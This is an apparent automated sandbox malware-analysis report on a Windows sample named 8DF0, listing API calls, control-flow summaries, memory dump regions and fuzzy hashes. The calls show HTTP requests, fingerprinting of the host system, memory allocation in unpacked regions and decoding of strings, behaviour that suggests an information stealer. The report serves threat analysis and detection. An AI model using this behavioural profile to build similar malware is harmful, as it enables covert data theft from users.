                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen
                                                    • String ID: ERROR
                                                    • API String ID: 367037083-2861137601
                                                    • Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                    • Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
                                                    • Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                    • Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

                                                    Control-flow Graph (rendered graph omitted; recoverable node list summarised): entry block 0x4056c0. Blocks 0x4056e6 through 0x40585c build strings with lstrcpy (lstrcatA further on) around helper calls to 0x402840, 0x404ae0, 0x424090 and 0x402930. Block 0x405868-0x40589a calls InternetOpenA and StrCmpCA; 0x405a92-0x405ac9 calls InternetConnectA; 0x405acf-0x405b05 calls HttpOpenRequestA. The large block 0x405b0b-0x405e64 alternates calls to 0x427340 or 0x4272f0, 0x4272b0 and 0x402930, then measures and copies buffers with lstrlenA, GetProcessHeap, HeapAlloc and memcpy before HttpSendRequestA and a first InternetReadFile. Blocks 0x405e70-0x405f14 form the read loop (lstrlenA, lstrcpy, lstrcatA, InternetReadFile). Exit path: InternetCloseHandle at 0x405f1a, 0x405f27 and 0x405f34, followed by 17 calls to 0x402930 (block 0x405f34-0x405ff3).
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004056EF
                                                    • lstrlenA.KERNEL32(?), ref: 00405742
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen
                                                    • String ID: ------$"$--$------$~A
                                                    • API String ID: 367037083-2106860866
                                                    • Opcode ID: 410a932c6bab87270166b34b70898d87c953eaefeb5ca25504425efc99a93582
                                                    • Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
                                                    • Opcode Fuzzy Hash: 410a932c6bab87270166b34b70898d87c953eaefeb5ca25504425efc99a93582
                                                    • Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

                                                    Control-flow Graph

                                                    • Graph image (basic blocks 0x406b80-0x406e20; legend: Executed / Not Executed)
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
                                                    • StrCmpCA.SHLWAPI(?,00950150), ref: 00406C2D
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,0094FBE8,00000000,00000000,-00400100,00000000), ref: 00406C90
                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
                                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406DCE
                                                    • InternetCloseHandle.WININET(?), ref: 00406DD8
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406DE2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                    • String ID: ERROR$GET
                                                    • API String ID: 3687753495-3591763792
                                                    • Opcode ID: a725527196af3ae4b92051fc428e65d3a6d617651e74373eb01ce44d5f8fe4bd
                                                    • Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
                                                    • Opcode Fuzzy Hash: a725527196af3ae4b92051fc428e65d3a6d617651e74373eb01ce44d5f8fe4bd
                                                    • Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

                                                    Control-flow Graph

                                                    • Graph image (basic blocks 0x248003c-0x248091d; legend: Executed / Not Executed)
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0248024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14

                                                    Control-flow Graph

                                                    • Graph image (basic blocks 0x4226e0-0x422812; legend: Executed / Not Executed)
                                                    APIs
                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00948298), ref: 0042271B
                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00948298), ref: 0042274C
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00948298), ref: 004227AF
                                                    • HeapAlloc.KERNEL32(00000000,?,00948298), ref: 004227B6
                                                    • wsprintfA.USER32 ref: 004227DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                                    • String ID: :\$C
                                                    • API String ID: 1325379522-3309953409
                                                    • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
                                                    • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

                                                    Control-flow Graph

                                                    • Graph image (basic blocks 0x405570-0x4056b1; legend: Executed / Not Executed)
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00405590
                                                    • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
                                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
                                                    • KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
                                                    • InternetCloseHandle.WININET(?), ref: 0040562B
                                                    • InternetCloseHandle.WININET(00000000), ref: 00405632
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
                                                    • String ID:
                                                    • API String ID: 1337183907-0
                                                    • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
                                                    • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                    • Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
                                                    • Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                    • Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

                                                    Control-flow Graph

                                                    • Graph image (basic blocks 0x404ae0-0x404b68; legend: Executed / Not Executed)
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000800,00948368), ref: 00404B17
                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
                                                    • lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
                                                    • InternetCrackUrlA.WININET(?,00000000), ref: 00404B47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@$CrackInternetlstrlen
                                                    • String ID: <
                                                    • API String ID: 1683549937-4251816714
                                                    • Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                    • Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
                                                    • Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                    • Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

                                                    Control-flow Graph

                                                    • Graph image (basic blocks 0x4228b0-0x422934; legend: Executed / Not Executed)
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                    • RegOpenKeyExA.KERNEL32(80000002,0094B668,00000000,00020119,00422849), ref: 004228EB
                                                    • RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                    • RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                    • String ID: CurrentBuildNumber

                                                    Control-flow Graph (rendered graph not reproduced; basic blocks 422820-4228a2 covering GetProcessHeap, HeapAlloc, a call to 4228b0, RegOpenKeyExA, RegQueryValueExA and RegCloseKey)
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0042283C
                                                      • Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                      • Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                      • Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,0094B668,00000000,00020119,00422849), ref: 004228EB
                                                      • Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                      • Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                    • RegOpenKeyExA.KERNEL32(80000002,0094B668,00000000,00020119,?), ref: 00422871
                                                    • RegQueryValueExA.KERNEL32(?,0094EB38,00000000,00000000,00000000,000000FF), ref: 0042288C
                                                    • RegCloseKey.ADVAPI32(?), ref: 00422896
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                    • String ID: Windows 11

                                                    Control-flow Graph (rendered graph not reproduced; basic blocks 41efe0-41f0f0 covering calls to 402840, 402930 and 406b80, lstrcpy and StrCmpCA)
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F013
                                                    • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: lstrcpy
                                                    • String ID: ERROR
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
                                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: Heap$AllocComputerNameProcess
                                                    • String ID:
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0092B0E6
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0092B106
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0092A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_92a000_8DF0.jbxd
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000400,?,?,02480223,?,?), ref: 02480E19
                                                    • SetErrorMode.KERNEL32(00000000,?,?,02480223,?,?), ref: 02480E1E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0092ADCE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0092A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_92a000_8DF0.jbxd
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249707C
                                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024970AF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024970E9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497110
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249711B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497144
                                                    • lstrlen.KERNEL32(00435320), ref: 0249715E
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497180
                                                    • lstrcat.KERNEL32(00000000,00435320), ref: 0249718C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024971B7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024971E7
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0249721C
                                                    • strtok_s.MSVCRT ref: 02497249
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497284
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024972B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
                                                    • String ID: hSC
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02486296
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024862E9
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248631C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248634C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02486387
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024863BA
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 024863CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$InternetOpen
                                                    • String ID: "$------$TPC$TPC$TPC
                                                    • API String ID: 2041821634-3953685780
                                                    • Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                    • Instruction ID: e8b409b156e42a220ffc92f372b55e5edf0f7c22c0fde6280f50158e4077db5d
                                                    • Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                    • Instruction Fuzzy Hash: 83527171911256AFDB21FF75DC88EAE77BAAF44308F15442AE805EB650DB74D802CFA0
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040602F
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$InternetOpen
                                                    • String ID: "$------
                                                    • API String ID: 2041821634-2370822465
                                                    • Opcode ID: 71a5e4ecdfd950b5bf9058453f318c0653db86c2706be46f58796bec72eee3f8
                                                    • Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
                                                    • Opcode Fuzzy Hash: 71a5e4ecdfd950b5bf9058453f318c0653db86c2706be46f58796bec72eee3f8
                                                    • Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497284
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024972B4
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024972E4
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497316
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02497323
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0249732A
                                                    • StrStrA.SHLWAPI(00000000,00435350), ref: 02497341
                                                    • lstrlen.KERNEL32(00000000), ref: 0249734C
                                                    • malloc.MSVCRT ref: 02497356
                                                    • strncpy.MSVCRT ref: 02497364
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249738F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024973B6
                                                    • StrStrA.SHLWAPI(00000000,00435358), ref: 024973C9
                                                    • lstrlen.KERNEL32(00000000), ref: 024973D4
                                                    • malloc.MSVCRT ref: 024973DE
                                                    • strncpy.MSVCRT ref: 024973EC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497417
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249743E
                                                    • StrStrA.SHLWAPI(00000000,00435360), ref: 02497451
                                                    • lstrlen.KERNEL32(00000000), ref: 0249745C
                                                    • malloc.MSVCRT ref: 02497466
                                                    • strncpy.MSVCRT ref: 02497474
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249749F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024974C6
                                                    • StrStrA.SHLWAPI(00000000,00435368), ref: 024974D9
                                                    • lstrlen.KERNEL32(00000000), ref: 024974E8
                                                    • malloc.MSVCRT ref: 024974F2
                                                    • strncpy.MSVCRT ref: 02497500
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497530
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497558
                                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0249757B
                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0249758F
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024975B0
                                                    • LocalFree.KERNEL32(00000000), ref: 024975BB
                                                    • lstrlen.KERNEL32(?), ref: 02497655
                                                    • lstrlen.KERNEL32(?), ref: 02497668
                                                    • lstrlen.KERNEL32(?), ref: 0249767B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
